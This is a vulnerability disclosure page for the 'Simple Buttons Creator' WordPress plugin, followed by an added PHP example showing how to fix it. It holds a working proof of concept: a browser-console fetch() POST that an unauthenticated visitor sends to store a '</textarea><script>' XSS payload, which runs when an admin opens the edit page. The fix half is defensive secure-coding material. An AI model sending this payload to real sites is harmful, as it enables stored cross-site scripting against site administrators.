## https://sploitus.com/exploit?id=WPEX-ID:B7A35C5B-474A-444A-85EE-C50782C7A6C2
As a visitor who is not logged in, run the following in the browser console (replace `<<ANY_ID>>` with any number):

```javascript
fetch("/wp-content/plugins/simple-buttons-creator/bt-manage.php?page=sbc-new&method=post", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'button_id=<<ANY_ID>>&bt_name=CSRF909&bt_text=CSRF&bt_link=CSRF&bt_bg_color=CSRF&bt_txt_color=CSRF&bt_font_size=&bt_border_radius=&bt_css=</textarea><script>alert(2)</script>',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```

As an admin, go to:

https://example.com/wp-admin/admin.php?page=simple-buttons&method=edit&id=<<ANY_ID>>

and see the XSS.
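The two root causes shown by the PoC are that the save handler accepts the POST from an unauthenticated visitor, and that the edit page prints the stored `bt_css` value into a `<textarea>` without escaping. The following is an added example of how a plugin handler could close both gaps; it is not the plugin's own code, and the function names, nonce name and database table are assumptions, while the form field names are taken from the PoC above.

```php
<?php
// Added example (not the plugin's own code). Table name, nonce name and
// function names are assumptions; the form field names come from the PoC.

// 1. Only process the form for logged-in users with the right capability,
//    and only when the request carries a valid nonce. This rejects both the
//    unauthenticated POST from the PoC and a cross-site request from a
//    logged-in admin's browser.
function sbc_handle_save() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'sbc_save_button', 'sbc_nonce' ); // nonce name is an assumption

    global $wpdb;
    $table = $wpdb->prefix . 'sbc_buttons'; // table name is an assumption

    // Sanitise every field on the way in; the type chosen matches the field.
    $data = array(
        'bt_name'          => sanitize_text_field( wp_unslash( $_POST['bt_name'] ?? '' ) ),
        'bt_text'          => sanitize_text_field( wp_unslash( $_POST['bt_text'] ?? '' ) ),
        'bt_link'          => esc_url_raw( wp_unslash( $_POST['bt_link'] ?? '' ) ),
        'bt_bg_color'      => sanitize_text_field( wp_unslash( $_POST['bt_bg_color'] ?? '' ) ),
        'bt_txt_color'     => sanitize_text_field( wp_unslash( $_POST['bt_txt_color'] ?? '' ) ),
        'bt_font_size'     => absint( $_POST['bt_font_size'] ?? 0 ),
        'bt_border_radius' => absint( $_POST['bt_border_radius'] ?? 0 ),
        // Free-form CSS: strip markup on input; output escaping is still required.
        'bt_css'           => wp_strip_all_tags( wp_unslash( $_POST['bt_css'] ?? '' ) ),
    );

    $id = absint( $_POST['button_id'] ?? 0 );
    if ( $id ) {
        $wpdb->update( $table, $data, array( 'id' => $id ) );
    } else {
        $wpdb->insert( $table, $data );
    }
}

// 2. On the edit page, escape each stored value for the HTML context it
//    lands in. esc_textarea() encodes '<' and '>', so a stored
//    '</textarea><script>' string can no longer close the element.
function sbc_render_edit_fields( $row ) {
    echo '<input type="text" name="bt_name" value="' . esc_attr( $row->bt_name ) . '">';
    echo '<textarea name="bt_css">' . esc_textarea( $row->bt_css ) . '</textarea>';
}
```

Input sanitisation alone is not enough here: even with `wp_strip_all_tags()`, the output escaping in `sbc_render_edit_fields()` is what guarantees the stored value cannot break out of the `<textarea>`.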